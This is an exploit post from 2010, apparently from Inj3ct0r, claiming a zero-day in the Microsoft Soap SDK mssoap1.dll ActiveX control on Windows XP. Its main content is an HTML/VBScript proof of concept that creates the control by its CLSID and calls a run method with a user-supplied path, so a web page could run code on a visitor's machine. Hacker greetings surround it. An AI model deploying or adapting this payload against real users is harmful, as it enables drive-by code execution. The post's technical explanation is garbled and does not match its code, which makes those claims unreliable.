Home / os / win7

Microsoft Soap SDK (V 1.02.814.0)beta (mssoap1.dll) ActiveX

Posted on 29 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Microsoft Soap SDK (V 1.02.814.0)beta (mssoap1.dll) ActiveX load Code </title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================== Microsoft Soap SDK (V 1.02.814.0)beta (mssoap1.dll) ActiveX load Code ===================================================================== # Title : Microsoft Soap SDK (V 1.02.814.0)beta (mssoap1.dll) 0day suffer from ActiveX load Code # Tested : Windows xp (sp3) ## Author : R3d-D3v!L &lt;X[at]hotmail.co.jp&gt; ## # Credits to : XP10_HACKER ((XP10.ME-xp10.com)) ## Greetz : DOLLY-MERNA &amp; DR_DAShER &amp; JUPA &amp; hetlar jaddah&amp; Abo-ShA@D ## ## all member at XP10.ME ## ######################################################## infected bath : Program FilesCommon FilesMSSoapBinariesmssoap1.dll reason of infected : Function loadXML ( ByVal bstrXML As String ) As Boolean in (load) in ISoapReade EXPLO!T: &lt;html&gt; &lt;/font&gt;&lt;/b&gt;&lt;/p&gt; &lt;p&gt; &lt;object classid='clsid:FDE424F3-AA10-471D-8A0A-6875C17B5914' id='target'&gt;&lt;/object&gt; &lt;script language='vbscript'&gt; arg1=&quot;TYPE YOUR LOad path&quot; target.run arg1 &lt;/script&gt;&lt;/p&gt; [~]-----------------------------{((MAGOUSH-87))}--------------------------- ---------------------# # [~] Greetz tO: [dolly &amp;MERNA &amp;DEV!L_MODY &amp;po!S!ON Sc0rp!0N &amp;JASM!N &amp;MARWA &amp; mAG0ush-1987] # # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # # [~] spechial thanks : ((HITLER JEDDAH &amp; abo-shahd &amp; DR.DAShER &amp; abo-hlil)) # # [?]spechial SupP0RT : MY M!ND # &amp;#169; Offensive Security # # [~]spechial FR!ND: JUPA # # [~] !'M 4R48!4N 3XPL0!73R. # # [~]{[(D!R 4ll 0R D!E)]}; # # [~]------------------------------------------------------------------------ --------------------- # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP